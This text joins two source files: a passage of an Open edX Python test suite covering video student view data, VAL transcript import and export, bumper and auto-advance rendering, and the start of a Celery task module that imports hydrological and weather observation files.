video_declaration,
"<source src='", self.TEST_SOURCE_URL, "'/> ",
"<transcript language='", self.TEST_LANGUAGE, "' src='german_translation.srt' /> ",
"</video>"]
)
self.transcript_url = "transcript_url"
self.video = instantiate_descriptor(data=sample_xml)
self.video.runtime.handler_url = Mock(return_value=self.transcript_url)
self.video.runtime.course_id = MagicMock()
def setup_val_video(self, associate_course_in_val=False):
"""
Creates a video entry in VAL.
Arguments:
associate_course_in_val - If True, associates the test course with the video in VAL.
"""
create_profile('mobile')
create_video({
'edx_video_id': self.TEST_EDX_VIDEO_ID,
'client_video_id': 'test_client_video_id',
'duration': self.TEST_DURATION,
'status': 'dummy',
'encoded_videos': [self.TEST_ENCODED_VIDEO],
'courses': [unicode(self.video.location.course_key)] if associate_course_in_val else [],
})
self.val_video = get_video_info(self.TEST_EDX_VIDEO_ID) # pylint: disable=attribute-defined-outside-init
def get_result(self, allow_cache_miss=True):
"""
Returns the result from calling the video's student_view_data method.
Arguments:
allow_cache_miss is passed in the context to the student_view_data method.
"""
context = {
"profiles": [self.TEST_PROFILE],
"allow_cache_miss": "True" if allow_cache_miss else "False"
}
return self.video.student_view_data(context)
def verify_result_with_fallback_and_youtube(self, result):
"""
Verifies the result is as expected when returning "fallback" video data (not from VAL).
"""
self.assertDictEqual(
result,
{
"only_on_web": False,
"duration": None,
"transcripts": {self.TEST_LANGUAGE: self.transcript_url},
"encoded_videos": {
"fallback": {"url": self.TEST_SOURCE_URL, "file_size": 0},
"youtube": {"url": self.TEST_YOUTUBE_EXPECTED_URL, "file_size": 0}
},
"all_sources": [self.TEST_SOURCE_URL],
}
)
def verify_result_with_youtube_url(self, result):
"""
        Verifies the result is as expected when returning only a youtube url (no fallback source, not from VAL).
"""
self.assertDictEqual(
result,
{
"only_on_web": False,
"duration": None,
"transcripts": {self.TEST_LANGUAGE: self.transcript_url},
"encoded_videos": {"youtube": {"url": self.TEST_YOUTUBE_EXPECTED_URL, "file_size": 0}},
"all_sources": [],
}
)
def verify_result_with_val_profile(self, result):
"""
Verifies the result is as expected when returning video data from VAL.
"""
self.assertDictContainsSubset(
result.pop("encoded_videos")[self.TEST_PROFILE],
self.TEST_ENCODED_VIDEO,
)
self.assertDictEqual(
result,
{
"only_on_web": False,
"duration": self.TEST_DURATION,
"transcripts": {self.TEST_LANGUAGE: self.transcript_url},
'all_sources': [self.TEST_SOURCE_URL],
}
)
def test_only_on_web(self):
self.video.only_on_web = True
result = self.get_result()
self.assertDictEqual(result, {"only_on_web": True})
def test_no_edx_video_id(self):
result = self.get_result()
self.verify_result_with_fallback_and_youtube(result)
def test_no_edx_video_id_and_no_fallback(self):
video_declaration = "<video display_name='Test Video' youtube_id_1_0=\'{}\'>".format(self.TEST_YOUTUBE_ID)
# the video has no source listed, only a youtube link, so no fallback url will be provided
sample_xml = ''.join([
video_declaration,
"<transcript language='", self.TEST_LANGUAGE, "' src='german_translation.srt' /> ",
"</video>"
])
self.transcript_url = "transcript_url"
self.video = instantiate_descriptor(data=sample_xml)
self.video.runtime.handler_url = Mock(return_value=self.transcript_url)
self.video.runtime.course_id = MagicMock()
result = self.get_result()
self.verify_result_with_youtube_url(result)
@ddt.data(True, False)
def test_with_edx_video_id_video_associated_in_val(self, allow_cache_miss):
"""
Tests retrieving a video that is stored in VAL and associated with a course in VAL.
"""
self.video.edx_video_id = self.TEST_EDX_VIDEO_ID
self.setup_val_video(associate_course_in_val=True)
# the video is associated in VAL so no cache miss should ever happen but test retrieval in both contexts
result = self.get_result(allow_cache_miss)
self.verify_result_with_val_profile(result)
@ddt.data(True, False)
def test_with_edx_video_id_video_unassociated_in_val(self, allow_cache_miss):
"""
Tests retrieving a video that is stored in VAL but not associated with a course in VAL.
"""
self.video.edx_video_id = self.TEST_EDX_VIDEO_ID
self.setup_val_video(associate_course_in_val=False)
result = self.get_result(allow_cache_miss)
if allow_cache_miss:
self.verify_result_with_val_profile(result)
else:
self.verify_result_with_fallback_and_youtube(result)
@ddt.data(True, False)
def test_with_edx_video_id_video_not_in_val(self, allow_cache_miss):
"""
Tests retrieving a video that is not stored in VAL.
"""
self.video.edx_video_id = self.TEST_EDX_VIDEO_ID
        # The video is not in VAL, so in contexts that do and don't allow cache misses we should always get a fallback
result = self.get_result(allow_cache_miss)
self.verify_result_with_fallback_and_youtube(result)
@ddt.data(
({}, '', [], ['en']),
({}, '', ['de'], ['de']),
({}, '', ['en', 'de'], ['en', 'de']),
({}, 'en-subs', ['de'], ['en', 'de']),
({'uk': 1}, 'en-subs', ['de'], ['en', 'uk', 'de']),
({'uk': 1, 'de': 1}, 'en-subs', ['de', 'en'], ['en', 'uk', 'de']),
)
@ddt.unpack
@patch('xmodule.video_module.transcripts_utils.edxval_api.get_available_transcript_languages')
def test_student_view_with_val_transcripts_enabled(self, transcripts, english_sub, val_transcripts,
expected_transcripts, mock_get_transcript_languages):
"""
Test `student_view_data` with edx-val transcripts enabled.
"""
mock_get_transcript_languages.return_value = val_transcripts
self.video.transcripts = transcripts
self.video.sub = english_sub
student_view_response = self.get_result()
self.assertItemsEqual(student_view_response['transcripts'].keys(), expected_transcripts)
@attr(shard=7)
@ddt.ddt
class VideoDescriptorTest(TestCase, VideoDescriptorTestBase):
"""
Tests for video descriptor that requires access to django settings.
"""
def setUp(self):
super(VideoDescriptorTest, self).setUp()
self.descriptor.runtime.handler_url = MagicMock()
self.descriptor.runtime.course_id = MagicMock()
self.temp_dir = mkdtemp()
file_system = OSFS(self.temp_dir)
self.file_system = file_system.makedir(EXPORT_IMPORT_COURSE_DIR, recreate=True)
self.addCleanup(shutil.rmtree, self.temp_dir)
def get_video_transcript_data(self, video_id, language_code='en', file_format='srt', provider='Custom'):
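        """Build the transcript metadata dict expected from VAL for the given video."""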
return dict(
video_id=video_id,
language_code=language_code,
provider=provider,
file_format=file_format,
)
def test_get_context(self):
""""
Test get_context.
This test is located here and not in xmodule.tests because get_context calls editable_metadata_fields.
Which, in turn, uses settings.LANGUAGES from django setttings.
"""
correct_tabs = [
{
'name': "Basic",
'template': "video/transcripts.html",
'current': True
},
{
'name': 'Advanced',
'template': 'tabs/metadata-edit-tab.html'
}
]
rendered_context = self.descriptor.get_context()
self.assertListEqual(rendered_context['tabs'], correct_tabs)
# Assert that the Video ID field is present in basic tab metadata context.
self.assertEqual(
rendered_context['transcripts_basic_tab_metadata']['edx_video_id'],
self.descriptor.editable_metadata_fields['edx_video_id']
)
def test_export_val_data_with_internal(self):
"""
        Tests that VAL video data is exported as expected.
"""
language_code = 'ar'
transcript_file_name = 'test_edx_video_id-ar.srt'
expected_transcript_path = combine(
combine(self.temp_dir, EXPORT_IMPORT_COURSE_DIR),
combine(EXPORT_IMPORT_STATIC_DIR, transcript_file_name)
)
self.descriptor.edx_video_id = 'test_edx_video_id'
create_profile('mobile')
create_video({
'edx_video_id': self.descriptor.edx_video_id,
'client_video_id': 'test_client_video_id',
'duration': 111.0,
'status': 'dummy',
'encoded_videos': [{
'profile': 'mobile',
'url': 'http://example.com/video',
'file_size': 222,
'bitrate': 333,
}],
})
create_or_update_video_transcript(
video_id=self.descriptor.edx_video_id,
language_code=language_code,
metadata={
'provider': 'Cielo24',
'file_format': 'srt'
},
file_data=ContentFile(TRANSCRIPT_FILE_SRT_DATA)
)
actual = self.descriptor.definition_to_xml(resource_fs=self.file_system)
expected_str = """
<video download_video="false" url_name="SampleProblem" transcripts='{transcripts}'>
<video_asset client_video_id="test_client_video_id" duration="111.0" image="">
<encoded_video profile="mobile" url="http://example.com/video" file_size="222" bitrate="333"/>
<transcripts>
<transcript file_format="srt" language_code="{language_code}" provider="Cielo24"/>
</transcripts>
</video_asset>
<transcript language="{language_code}" src="{transcript_file}"/>
</video>
""".format(
language_code=language_code,
transcript_file=transcript_file_name,
transcripts=json.dumps({language_code: transcript_file_name})
)
parser = etree.XMLParser(remove_blank_text=True)
expected = etree.XML(expected_str, parser=parser)
self.assertXmlEqual(expected, actual)
# Verify transcript file is created.
self.assertEqual([transcript_file_name], self.file_system.listdir(EXPORT_IMPORT_STATIC_DIR))
# Also verify the content of created transcript file.
expected_transcript_content = File(open(expected_transcript_path)).read()
transcript = get_video_transcript_data(video_id=self.descriptor.edx_video_id, language_code=language_code)
self.assertEqual(transcript['content'], expected_transcript_content)
@ddt.data(
(['en', 'da'], 'test_sub', ''),
(['da'], 'test_sub', 'test_sub')
)
@ddt.unpack
def test_export_val_transcripts_backward_compatibility(self, languages, sub, expected_sub):
"""
Tests new transcripts export for backward compatibility.
"""
self.descriptor.edx_video_id = 'test_video_id'
self.descriptor.sub = sub
# Setup VAL encode profile, video and transcripts
create_profile('mobile')
create_video({
'edx_video_id': self.descriptor.edx_video_id,
'client_video_id': 'test_client_video_id',
'duration': 111.0,
'status': 'dummy',
'encoded_videos': [{
'profile': 'mobile',
'url': 'http://example.com/video',
'file_size': 222,
'bitrate': 333,
}],
})
for language in languages:
create_video_transcript(
video_id=self.descriptor.edx_video_id,
language_code=language,
file_format=Transcript.SRT,
content=ContentFile(TRANSCRIPT_FILE_SRT_DATA)
)
# Export the video module into xml
video_xml = self.descriptor.definition_to_xml(resource_fs=self.file_system)
# Assert `sub` and `transcripts` attribute in the xml
self.assertEqual(video_xml.get('sub'), expected_sub)
expected_transcripts = {
language: "{edx_video_id}-{language}.srt".format(
edx_video_id=self.descriptor.edx_video_id,
language=language
)
for language in languages
}
self.assertDictEqual(json.loads(video_xml.get('transcripts')), expected_transcripts)
# Assert transcript content from course OLX
for language in languages:
expected_transcript_path = combine(
combine(self.temp_dir, EXPORT_IMPORT_COURSE_DIR),
combine(EXPORT_IMPORT_STATIC_DIR, expected_transcripts[language])
)
expected_transcript_content = File(open(expected_transcript_path)).read()
transcript = get_video_transcript_data(video_id=self.descriptor.edx_video_id, language_code=language)
self.assertEqual(transcript['content'], expected_transcript_content)
def test_export_val_data_not_found(self):
"""
        Tests that export works as expected when the video id is not found in VAL.
"""
self.descriptor.edx_video_id = 'nonexistent'
actual = self.descriptor.definition_to_xml(resource_fs=self.file_system)
expected_str = """<video download_video="false" url_name="SampleProblem"/>"""
parser = etree.XMLParser(remove_blank_text=True)
expected = etree.XML(expected_str, parser=parser)
self.assertXmlEqual(expected, actual)
@patch('xmodule.video_module.transcripts_utils.get_video_ids_info')
def test_export_no_video_ids(self, mock_get_video_ids_info):
"""
        Tests export when there is no video id; `export_to_xml` exports VAL data only when a video id is present.
"""
mock_get_video_ids_info.return_value = True, []
actual = self.descriptor.definition_to_xml(resource_fs=self.file_system)
expected_str = '<video url_name="SampleProblem" download_video="false"></video>'
parser = etree.XMLParser(remove_blank_text=True)
expected = etree.XML(expected_str, parser=parser)
self.assertXmlEqual(expected, actual)
def test_import_val_data_internal(self):
"""
        Test that importing internal VAL data works as expected.
"""
create_profile('mobile')
module_system = DummySystem(load_error_modules=True)
edx_video_id = 'test_edx_video_id'
sub_id = '0CzPOIIdUsA'
external_transcript_name = 'The_Flash.srt'
external_transcript_language_code = 'ur'
val_transcript_language_code = 'ar'
val_transcript_provider = 'Cielo24'
external_transcripts = {
external_transcript_language_code: external_transcript_name
}
# Create static directory in import file system and place transcript files inside it.
module_system.resources_fs.makedirs(EXPORT_IMPORT_STATIC_DIR, recreate=True)
# Create VAL transcript.
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
'test_edx_video_id-ar.srt',
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
# Create self.sub and self.transcripts transcript.
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
subs_filename(sub_id, self.descriptor.transcript_language),
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
external_transcript_name,
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
xml_data = """
<video edx_video_id='{edx_video_id}' sub='{sub_id}' transcripts='{transcripts}'>
<video_asset client_video_id="test_client_video_id" duration="111.0">
<encoded_video profile="mobile" url="http://example.com/video" file_size="222" bitrate="333"/>
<transcripts>
<transcript file_format="srt" language_code="{val_transcript_language_code}" provider="{val_transcript_provider}"/>
</transcripts>
</video_asset>
</video>
""".format(
edx_video_id=edx_video_id,
sub_id=sub_id,
transcripts=json.dumps(external_transcripts),
val_transcript_language_code=val_transcript_language_code,
val_transcript_provider=val_transcript_provider
)
id_generator = Mock()
id_generator.target_course_id = "test_course_id"
video = self.descriptor.from_xml(xml_data, module_system, id_generator)
self.assertEqual(video.edx_video_id, 'test_edx_video_id')
video_data = get_video_info(video.edx_video_id)
self.assertEqual(video_data['client_video_id'], 'test_client_video_id')
self.assertEqual(video_data['duration'], 111.0)
self.assertEqual(video_data['status'], 'imported')
self.assertEqual(video_data['courses'], [{id_generator.target_course_id: None}])
self.assertEqual(video_data['encoded_videos'][0]['profile'], 'mobile')
self.assertEqual(video_data['encoded_videos'][0]['url'], 'http://example.com/video')
self.assertEqual(video_data['encoded_videos'][0]['file_size'], 222)
self.assertEqual(video_data['encoded_videos'][0]['bitrate'], 333)
# Verify that VAL transcript is imported.
self.assertDictContainsSubset(
self.get_video_transcript_data(
edx_video_id,
language_code=val_transcript_language_code,
provider=val_transcript_provider
),
get_video_transcript(video.edx_video_id, val_transcript_language_code)
)
# Verify that transcript from sub field is imported.
self.assertDictContainsSubset(
self.get_video_transcript_data(
edx_video_id,
language_code=self.descriptor.transcript_language
),
get_video_transcript(video.edx_video_id, self.descriptor.transcript_language)
)
# Verify that transcript from transcript field is imported.
self.assertDictContainsSubset(
self.get_video_transcript_data(
edx_video_id,
language_code=external_transcript_language_code
),
get_video_transcript(video.edx_video_id, external_transcript_language_code)
)
def test_import_no_video_id(self):
"""
        Test that importing a video with no video id creates a new external video.
"""
xml_data = """<video><video_asset></video_asset></video>"""
module_system = DummySystem(load_error_modules=True)
id_generator = Mock()
# Verify edx_video_id is empty before.
self.assertEqual(self.descriptor.edx_video_id, u'')
video = self.descriptor.from_xml(xml_data, module_system, id_generator)
# Verify edx_video_id is populated after the import.
self.assertNotEqual(video.edx_video_id, u'')
video_data = get_video_info(video.edx_video_id)
self.assertEqual(video_data['client_video_id'], 'External Video')
self.assertEqual(video_data['duration'], 0.0)
self.assertEqual(video_data['status'], 'external')
def test_import_val_transcript(self):
"""
        Test that importing a video with a VAL transcript creates a new transcript record.
"""
edx_video_id = 'test_edx_video_id'
val_transcript_language_code = 'es'
val_transcript_provider = 'Cielo24'
xml_data = """
<video edx_video_id='{edx_video_id}'>
<video_asset client_video_id="test_client_video_id" duration="111.0">
<transcripts>
<transcript file_format="srt" language_code="{val_transcript_language_code}" provider="{val_transcript_provider}"/>
</transcripts>
</video_asset>
</video>
""".format(
edx_video_id=edx_video_id,
val_transcript_language_code=val_transcript_language_code,
val_transcript_provider=val_transcript_provider
)
module_system = DummySystem(load_error_modules=True)
id_generator = Mock()
# Create static directory in import file system and place transcript files inside it.
module_system.resources_fs.makedirs(EXPORT_IMPORT_STATIC_DIR, recreate=True)
# Create VAL transcript.
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
'test_edx_video_id-es.srt',
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
# Verify edx_video_id is empty before.
self.assertEqual(self.descriptor.edx_video_id, u'')
video = self.descriptor.from_xml(xml_data, module_system, id_generator)
# Verify edx_video_id is populated after the import.
self.assertNotEqual(video.edx_video_id, u'')
video_data = get_video_info(video.edx_video_id)
self.assertEqual(video_data['status'], 'imported')
# Verify that VAL transcript is imported.
self.assertDictContainsSubset(
self.get_video_transcript_data(
edx_video_id,
language_code=val_transcript_language_code,
provider=val_transcript_provider
),
get_video_transcript(video.edx_video_id, val_transcript_language_code)
)
@ddt.data(
(
'test_sub_id',
{'en': 'The_Flash.srt'},
'<transcripts><transcript file_format="srt" language_code="en" provider="Cielo24"/></transcripts>',
# VAL transcript takes priority
{
'video_id': u'test_edx_video_id',
'language_code': u'en',
'file_format': 'srt',
'provider': 'Cielo24'
}
),
(
'',
{'en': 'The_Flash.srt'},
'<transcripts><transcript file_format="srt" language_code="en" provider="Cielo24"/></transcripts>',
# VAL transcript takes priority
{
'video_id': u'test_edx_video_id',
'language_code': u'en',
'file_format': 'srt',
'provider': 'Cielo24'
}
),
(
'test_sub_id',
{},
'<transcripts><transcript file_format="srt" language_code="en" provider="Cielo24"/></transcripts>',
# VAL transcript takes priority
{
'video_id': u'test_edx_video_id',
'language_code': u'en',
'file_format': 'srt',
'provider': 'Cielo24'
}
),
(
'test_sub_id',
{'en': 'The_Flash.srt'},
'',
# self.sub transcript takes priority
{
'video_id': u'test_edx_video_id',
'language_code': u'en',
'file_format': 'sjson',
'provider': 'Custom'
}
),
(
'',
{'en': 'The_Flash.srt'},
'',
# self.transcripts would be saved.
{
'video_id': u'test_edx_video_id',
'language_code': u'en',
'file_format': 'srt',
'provider': 'Custom'
}
)
)
@ddt.unpack
def test_import_val_transcript_priority(self, sub_id, external_transcripts, val_transcripts, expected_transcript):
"""
        Test that importing a video with different types of transcripts for the same
        language creates the expected transcript record.
"""
edx_video_id = 'test_edx_video_id'
language_code = 'en'
module_system = DummySystem(load_error_modules=True)
id_generator = Mock()
# Create static directory in import file system and place transcript files inside it.
module_system.resources_fs.makedirs(EXPORT_IMPORT_STATIC_DIR, recreate=True)
xml_data = "<video edx_video_id='test_edx_video_id'"
# Prepare self.sub transcript data.
if sub_id:
create_file_in_fs(
TRANSCRIPT_FILE_SJSON_DATA,
subs_filename(sub_id, language_code),
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
xml_data += " sub='{sub_id}'".format(
sub_id=sub_id
)
# Prepare self.transcripts transcripts data.
if external_transcripts:
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
external_transcripts['en'],
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
xml_data += " transcripts='{transcripts}'".format(
transcripts=json.dumps(external_transcripts),
)
xml_data += '><video_asset client_video_id="test_client_video_id" duration="111.0">'
# Prepare VAL transcripts data.
if val_transcripts:
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
'{edx_video_id}-{language_code}.srt'.format(
edx_video_id=edx_video_id,
language_code=language_code
),
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
xml_data += val_transcripts
xml_data += '</video_asset></video>'
# Verify edx_video_id is empty before import.
self.assertEqual(self.descriptor.edx_video_id, u'')
video = self.descriptor.from_xml(xml_data, module_system, id_generator)
# Verify edx_video_id is not empty after import.
self.assertNotEqual(video.edx_video_id, u'')
video_data = get_video_info(video.edx_video_id)
self.assertEqual(video_data['status'], 'imported')
# Verify that correct transcripts are imported.
self.assertDictContainsSubset(
expected_transcript,
get_video_transcript(video.edx_video_id, language_code)
)
def test_import_val_data_invalid(self):
create_profile('mobile')
module_system = DummySystem(load_error_modules=True)
# Negative file_size is invalid
xml_data = """
<video edx_video_id="test_edx_video_id">
<video_asset client_video_id="test_client_video_id" duration="111.0">
<encoded_video profile="mobile" url="http://example.com/video" file_size="-222" bitrate="333"/>
</video_asset>
</video>
"""
with self.assertRaises(ValCannotCreateError):
VideoDescriptor.from_xml(xml_data, module_system, id_generator=Mock())
with self.assertRaises(ValVideoNotFoundError):
get_video_info("test_edx_video_id")
class TestVideoWithBumper(TestVideo):
"""
Tests rendered content in presence of video bumper.
"""
CATEGORY = "video"
METADATA = {}
# Use temporary FEATURES in this test without affecting the original
FEATURES = dict(settings.FEATURES)
@patch('xmodule.video_module.bumper_utils.get_bumper_settings')
def test_is_bumper_enabled(self, get_bumper_settings):
"""
        Check that the bumper is shown when ENABLE_VIDEO_BUMPER is True and hidden when it is False.
Assume that bumper settings are correct.
"""
self.FEATURES.update({
"SHOW_BUMPER_PERIODICITY": 1,
"ENABLE_VIDEO_BUMPER": True,
})
get_bumper_settings.return_value = {
"video_id": "edx_video_id",
"transcripts": {},
}
with override_settings(FEATURES=self.FEATURES):
self.assertTrue(bumper_utils.is_bumper_enabled(self.item_descriptor))
self.FEATURES.update({"ENABLE_VIDEO_BUMPER": False})
with override_settings(FEATURES=self.FEATURES):
self.assertFalse(bumper_utils.is_bumper_enabled(self.item_descriptor))
@patch('xmodule.video_module.bumper_utils.is_bumper_enabled')
@patch('xmodule.video_module.bumper_utils.get_bumper_settings')
@patch('edxval.api.get_urls_for_profiles')
def test_bumper_metadata(self, get_url_for_profiles, get_bumper_settings, is_bumper_enabled):
"""
Test content with rendered bumper metadata.
"""
get_url_for_profiles.return_value = {
'desktop_mp4': 'http://test_bumper.mp4',
'desktop_webm': '',
}
get_bumper_settings.return_value = {
'video_id': 'edx_video_id',
'transcripts': {},
}
is_bumper_enabled.return_value = True
content = self.item_descriptor.render(STUDENT_VIEW).content
sources = [u'example.mp4', u'example.webm']
expected_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': json.dumps(OrderedDict({
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'showCaptions': 'true',
'sources': ['http://test_bumper.mp4'],
'streams': '',
'transcriptLanguage': 'en',
'transcriptLanguages': {'en': 'English'},
'transcriptTranslationUrl': video_utils.set_query_parameter(
self.get_handler_url('transcript', 'translation/__lang__'), 'is_bumper', 1
),
'transcriptAvailableTranslationsUrl': video_utils.set_query_parameter(
self.get_handler_url('transcript', 'available_translations'), 'is_bumper', 1
),
"publishCompletionUrl": video_utils.set_query_parameter(
self.get_handler_url('publish_completion', ''), 'is_bumper', 1
),
})),
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'metadata': json.dumps(OrderedDict({
'autoAdvance': False,
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'autoplay': False,
'streams': '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg',
'sources': sources,
'poster': None,
'duration': None,
'captionDataDir': None,
'showCaptions': 'true',
'generalSpeed': 1.0,
'speed': None,
'savedVideoPosition': 0.0,
'start': 3603.0,
'end': 3610.0,
'transcriptLanguage': 'en',
'transcriptLanguages': OrderedDict({'en': 'English', 'uk': u'Українська'}),
'ytTestTimeout': 1500,
'ytApiUrl': 'https://www.youtube.com/iframe_api',
'ytMetadataUrl': 'https://www.googleapis.com/youtube/v3/videos/',
'ytKey': None,
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'autohideHtml5': False,
'recordedYoutubeIsAvailable': True,
'completionEnabled': False,
'completionPercentage': 0.95,
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
})),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': json.dumps(OrderedDict({
'url': 'http://img.youtube.com/vi/ZwkTiUPN0mg/0.jpg',
'type': 'youtube'
}))
}
expected_content = self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
self.assertEqual(content, expected_content)
@ddt.ddt
class TestAutoAdvanceVideo(TestVideo):
"""
Tests the server side of video auto-advance.
"""
CATEGORY = "video"
METADATA = {}
# Use temporary FEATURES in this test without affecting the original
FEATURES = dict(settings.FEATURES)
def prepare_expected_context(self, autoadvanceenabled_flag, autoadvance_flag):
"""
Build a dictionary with data expected by some operations in this test.
Only parameters related to auto-advance are variable, rest is fixed.
"""
context = {
'autoadvance_enabled': autoadvanceenabled_flag,
'branding_info': None,
'license': None,
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'bumper_metadata': 'null',
'metadata': json.dumps(OrderedDict({
'autoAdvance': autoadvance_flag,
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'autoplay': False,
'streams': '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg',
'sources': [u'example.mp4', u'example.webm'],
'duration': None,
'poster': None,
'captionDataDir': None,
'showCaptions': 'true',
'generalSpeed': 1.0,
'speed': None,
'savedVideoPosition': 0.0,
'start': 3603.0,
'end': 3610.0,
'transcriptLanguage': 'en',
'transcriptLanguages': OrderedDict({'en': 'English', 'uk': u'Українська'}),
'ytTestTimeout': 1500,
'ytApiUrl': 'https://www.youtube.com/iframe_api',
'ytMetadataUrl': 'https://www.googleapis.com/youtube/v3/videos/',
'ytKey': None,
'transcriptTranslationUrl': self.item_descriptor.xmodule_runtime.handler_url(
self.item_descriptor, 'transcript', 'translation/__lang__'
).rstrip('/?'),
'transcriptAvailableTranslationsUrl': self.item_descriptor.xmodule_runtime.handler_url(
self.item_descriptor, 'transcript', 'available_translations'
).rstrip('/?'),
'autohideHtml5': False,
'recordedYoutubeIsAvailable': True,
'completionEnabled': False,
'completionPercentage': 0.95,
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
})),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null'
}
return context
def assert_content_matches_expectations(self, autoadvanceenabled_must_be, autoadvance_must_be):
"""
Check (assert) that loading video.html produces content that corresponds
to the passed context.
Helper function to avoid code repetition.
"""
with override_settings(FEATURES=self.FEATURES):
content = self.item_descriptor.render(STUDENT_VIEW).content
expected_context = self.prepare_expected_context(
autoadvanceenabled_flag=autoadvanceenabled_must_be,
autoadvance_flag=autoadvance_must_be,
)
with override_settings(FEATURES=self.FEATURES):
expected_content = self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
self.assertEqual(content, expected_content)
def change_course_setting_autoadvance(self, new_value):
"""
Change the .video_auto_advance course setting (a.k.a. advanced setting).
This avoids doing .save(), and instead modifies the instance directly.
Based on test code for video_bumper setting.
"""
# This first render is done to initialize the instance
self.item_descriptor.render(STUDENT_VIEW)
item_instance = self.item_descriptor.xmodule_runtime.xmodule_instance
item_instance.video_auto_advance = new_value
# After this step, render() should see the new value
# e.g. use self.item_descriptor.render(STUDENT_VIEW).content
@ddt.data(
(False, False),
(False, True),
(True, False),
(True, True),
)
@ddt.unpack
def test_is_autoadvance_available_and_enabled(self, global_setting, course_setting):
"""
        Check that auto-advance is not available when it is disabled via the feature flag
        (ENABLE_AUTOADVANCE_VIDEOS set to False) or via the course setting.
        It checks that:
        - the controls are visible only when the feature flag and the course setting
          are both True
        - when the controls are visible, the video will auto-advance (because that is
          the default); in all other cases it won't
"""
self.FEATURES.update({"ENABLE_AUTOADVANCE_VIDEOS": global_setting})
self.change_course_setting_autoadvance(new_value=course_setting)
self.assert_content_matches_expectations(
autoadvanceenabled_must_be=(global_setting and course_setting),
autoadvance_must_be=(global_setting and course_setting),
)
| agpl-3.0 |
gis4dis/poster | apps/processing/pmo/tasks.py | 1 | 3380 | from __future__ import absolute_import, unicode_literals
import os
from datetime import timedelta, datetime
from celery.task import task, group
from celery.utils.log import get_task_logger
from django.conf import settings
from django.core.files.storage import default_storage
from django.core.management import call_command
from apps.processing.pmo.models import WatercourseObservation, WeatherObservation
from apps.processing.pmo.util import util
from apps.utils.time import UTC_P0100
logger = get_task_logger(__name__)
@task(name="pmo.import")
def import_default(*args):
try:
call_command('pmo_import', *args)
except Exception as e:
logger.critical(e)
def get_last_record(model):
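    """Return the latest record of ``model`` by phenomenon_time_range, or None if there is none."""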
try:
last_item = model.objects.all().latest('phenomenon_time_range')
except model.DoesNotExist:
last_item = None
return last_item
# https://github.com/gis4dis/poster/issues/111
# Substitute '/import/' for django.conf.settings.IMPORT_ROOT
basedir_def = os.path.join(settings.IMPORT_ROOT, 'apps.processing.pmo', '')
@task(name="pmo.import_hod_observation")
def import_hod_observation(date_str):
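    """Import the HOD (watercourse observation) file for the given YYYYMMDD date string."""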
date_obj = datetime.strptime(date_str, "%Y%m%d").date()
logger.info('Importing HOD file: ' + str(date_obj))
util.load_hod(date_obj)
@task(name="pmo.import_srazsae_observation")
def import_srazsae_observation(date_str):
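    """Import the srazsae (weather observation) file for the given YYYYMMDD date string."""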
date = datetime.strptime(date_str, "%Y%m%d").date()
logger.info('Importing srazsae file: ' + str(date))
util.load_srazsae(date)
def get_dates_to_import(model, file):
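    """
    Return the YYYYMMDD date strings for which ``file`` exists in the import storage.

    Scans incrementally from the day after the last imported record, or walks every
    dated folder under the import root when no record exists yet.
    """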
last_record = get_last_record(model)
dates_to_import = []
if last_record is not None:
start_day = last_record.phenomenon_time_range.lower
start_day = start_day.replace(hour=0, minute=0, second=0, microsecond=0)
start_day = start_day + timedelta(1)
start_day = start_day.replace(tzinfo=UTC_P0100)
now = datetime.now()
now = now.replace(tzinfo=UTC_P0100)
today = now.replace(hour=0, minute=0, second=0, microsecond=0)
day_to = today
day = start_day
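        # Walk forward one day at a time, keeping only dates whose source file exists.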
while day <= day_to:
day_str = day.strftime("%Y%m%d")
path = basedir_def + day_str + '/' + str(file)
if default_storage.exists(path):
dates_to_import.append(day_str)
day += timedelta(1)
else:
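        # No previous record yet: scan every dated folder already present in storage.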
listed = default_storage.listdir(basedir_def)
for filename in listed:
if filename.is_dir:
folder_path = filename.object_name
path = folder_path + '/' + str(file)
if default_storage.exists(path):
day_str = filename.object_name.strip("/").split('/')[-1]
dates_to_import.append(day_str)
return dates_to_import
@task(name="pmo.import_observations")
def import_observations():
watercourse_dates_to_import = get_dates_to_import(WatercourseObservation, 'HOD.dat')
